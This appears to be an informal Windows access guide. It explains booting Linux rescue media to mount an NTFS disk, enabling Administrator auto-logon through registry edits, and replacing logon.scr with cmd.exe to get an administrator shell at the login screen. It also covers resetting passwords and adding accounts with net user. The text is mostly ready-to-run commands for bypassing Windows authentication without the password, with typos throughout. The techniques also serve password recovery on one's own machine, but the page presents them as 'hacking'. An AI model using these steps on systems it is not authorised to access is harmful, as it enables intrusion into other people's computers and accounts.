Use a Linux CD or USB boot media like system rescue or backtrack and mount the filesystem
$ fdisk -l /dev/hda $ mount -t ntfs-3g /dev/hda1 /mnt
PS: 'ntfsmount' should not be used because can cause data to be lost, use ntfs-3g.
Mounting images:
$ mount /isofile.iso /cdrom -t iso9660 -o loop $ losetup /dev/loop0 /floppy.img $ mount /dev/loop0 -o loop /mnt/floppy
Hacking the system registry can put you in to the administrator account without knowing or changing the password.
REGEDIT 4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "AutoAdminLogon"="1" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "DefaultUserName"="Administrator" <===== capital "A" "AltDefaultUserName"="Administrator" <===== capital "A" [HKEY_USERS\.DEFAULT\Control Panel\Desktop] "ScreenSaveTimeOut"="60" PS: maybe you also want to change DefaultDomainName & AltDefaultDomainName
net user <some_account>
where <some_account>
is one of the users listed by the net user
command. A administrator account is always in the Local Group Membership: *Administrators
.
Editing the registry without propper admin rights (not in win7):
c:\windows\system32\
. Backup logon.scr ("ren logon.scr logon.scr.bak
") and replace it with a copy of cmd.exe ("copy cmd.exe logon.scr
"). Now reboot and wait 10-15minutes at the logon prompt. After pop-up of the DOS box you have administrator previledges and can start regedit.exe
to set the AutoAdminLogon value for example. On NT and some win 2000 versions you can even use the command net user
- command (type net help user for info) to create, view change etc. user accounts!
Other usefull commands
compmgmt.msc
Computer Management Console. It contains a number of the other consoles
gpedit.msc
Group Policy Editor. Windows XP Professional only
services.msc
Manages the many services involved in Windows and installed software
control Ncpa.cpl users
To run the Users tool in Control Panel (may not work)
net user /ADD "user" /expires:never /passwordchg:no
net user <admin account> new-password
REGEDIT 4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "ScreenSaverGracePeriod"="99999"
Powertoy Tweak UI
Type "net user administrator /active:yes" without the quotes. then go to switch users and you should see the administrator account. go on there and if you plan on keeping it active then put a password on it.
To use the administrator account just once you don't put a password on it. or you can also boot in safe mode (F8) to use the admin account.